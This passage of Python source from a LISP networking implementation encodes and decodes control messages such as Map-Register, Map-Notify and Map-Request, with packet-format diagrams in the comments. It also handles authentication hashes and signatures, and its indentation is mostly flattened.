packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according to the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64-bits) out at a time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = b""
for i in range(0, len(key), 2):
byte = int(key[i:i+2], 16)
new_key += lisp_store_byte(byte)
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_store_byte
#
# We have to store a byte differently in a py2 string versus a py3 byte string.
# Check if the code was compiled with either python2 or python3.
#
def lisp_store_byte_py2(byte):
return(chr(byte))
#enddef
def lisp_store_byte_py3(byte):
return(bytes([byte]))
#enddef
lisp_store_byte = lisp_store_byte_py2
if (lisp_is_python3()): lisp_store_byte = lisp_store_byte_py3
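#
# Example (illustrative): lisp_store_byte(0x45) returns "E" under
# python2 and b"E" under python3, so callers can build packet byte
# strings one octet at a time without version checks.
#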
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread(object):
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header(object):
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid is one of 8 values that identify the encryption key-id used for
# encrypting Map-Register messages. When the Map-Register is encrypted, the
# entire message, not including the first 4 bytes, is chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was
# encrypted.
#
class lisp_map_register(object):
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
        self.auth_data = b""
self.xtr_id = 0
self.site_id = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
        # Append zeroed authentication data so we can compute the hash later.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = b""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce = byte_swap_64(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = b""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
        if (len(packet) < format_size): return(False)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
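#
# Illustrative sketch, not called by the protocol code: the flag bits
# that lisp_map_register.encode() sets in the first long-word are
# recovered by the masks decode() uses. Field values are invented.
#
def _example_map_register_first_long():
    import socket
    import struct

    first_long = (LISP_MAP_REGISTER << 28) | 5       # record-count 5
    first_long |= 0x08000000                         # proxy-reply requested
    first_long |= 0x100                              # Map-Notify requested

    wire = struct.pack("I", socket.htonl(first_long))
    value = socket.ntohl(struct.unpack("I", wire)[0])

    assert (value >> 28) == LISP_MAP_REGISTER
    assert bool(value & 0x08000000)                  # proxy_reply_requested
    assert bool(value & 0x100)                       # map_notify_requested
    assert (value & 0xff) == 5                       # record_count
#enddef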
#
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify(object):
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
    def zero_auth(self, packet):
        auth_data = b""
        if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
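#
# Illustrative sketch, not called by the protocol code: the zero-splice
# pattern lisp_map_notify.encode() uses for authentication data. Plain
# hmac/hashlib stand in here for lisp_hash_me(), whose exact construction
# is defined elsewhere in this file and may differ; the packet bytes and
# password are invented.
#
def _example_map_notify_auth_splice():
    import hashlib
    import hmac
    import struct

    offset = struct.calcsize("I") + struct.calcsize("QHH")
    auth_len = struct.calcsize("QQI")                # sha1-96 field size
    packet = b"\x00" * offset + b"\xff" * auth_len + b"eid-records"

    #
    # Hash is computed with the auth field zeroed, then spliced back in
    # at the same offset.
    #
    zeroed = packet[:offset] + b"\x00" * auth_len + packet[offset +
        auth_len:]
    digest = hmac.new(b"password", zeroed, hashlib.sha1).digest()
    return(packet[:offset] + digest + packet[offset + auth_len:])
#enddef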
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in the file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
class lisp_map_request(object):
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
self.json_telemetry = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
if (itr.afi == LISP_AFI_LCAF and self.json_telemetry != None):
continue
#endif
itr_str = red(itr.print_address_no_iid(), False)
lprint(" itr-rloc: afi {} {}{}".format(itr.afi, itr_str,
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
if (self.json_telemetry != None):
lprint(" itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
self.json_telemetry))
#endif
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data.encode())
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig.decode() }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
sig_data = sig_data.encode()
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode_json(self, json_string):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 4)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0, lcaf_len,
json_len)
packet += json_string.encode()
packet += struct.pack("H", 0)
return(packet)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
telemetry = lisp_telemetry_configured() if (self.rloc_probe) else None
if (telemetry != None): self.itr_rloc_count += 1
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
